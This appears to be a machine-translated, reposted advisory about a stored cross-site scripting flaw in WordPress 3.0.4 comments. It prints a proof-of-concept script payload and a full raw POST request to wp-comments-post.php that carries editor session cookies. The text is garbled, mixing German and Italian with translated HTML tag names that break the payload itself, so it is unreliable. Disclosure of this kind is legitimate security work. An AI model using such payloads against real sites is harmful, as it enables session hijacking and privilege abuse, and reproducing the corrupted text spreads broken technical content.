WordPress 3.0.4 präsentiert eine di vulnerabilità Stored XSS.
La grave vulnerabilità permette ad un qualsiasi visitatore di commentare un post inserendo all’interno del codice malevolo.
Abhilfe: Deaktivieren Sie die Möglichkeit, auf Beiträge zu kommentieren
### Betroffenes Produkt ###
+ WordPress: "WordPress ist Web-Software, die Sie verwenden, um eine schöne Website oder ein Blog erstellen.
Wir sagen gerne, dass WordPress sowohl kostenlose als auch unbezahlbar zugleich ist."
+ Homepage: http://wordpress.org
### Einzelheiten zu dieser Sicherheitsanfälligkeit ###
+ Beschreibung: Angreifer können zur Ausführung bösartigen JavaScript-Codes oder hijahttpg Sitzung für Privilegienerweiterung.
Der Angreifer hat die Autorität des Herausgebers.
Screenshot: http://img3.imageshack.us/img3/1148/wordpressx.png
PoC: ""--></Stil></Skript><Skript>alert("XSS")</Skript>
POST HTTP://localhost/wordpress304/wp-comments-post.php HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/wordpress304 /?page_id=2
Content-Length: 189
Cache-Control: max-age=0
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Accept: application / xml,application / xhtml xml,text / html;q = 0,9, text / plain;q = 0,8, image / png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko)
Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,DEFLATE,sdch
Accept-Language: en-US,en;q = 0,8, en-US;q = 0,6, in;q=0.4
Accept-Charset: ISO-8859-9, UTF-8;q = 0,7 *;q=0.3
Cookie: wp-settings-Zeit-1 = 1293719651; wordpress_test_cookie = WP Cookie überprüfen;
wordpress_logged_in_a9710e337f5b83061184233e85654d2c=editor%
7C1293893085%7C1b3f84f58059c0fcf262ef1bb83635c2; wp-settings-time-3=1293720285
comment=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&submit = Post Kommentar&comment_post_ID = 2
&comment_parent = 0&_wp_unfiltered_html_comment = 7741b495eb
The post XSS Schwachstelle Gespeicherte – WordPress 3.0.4 !!! appeared first on .
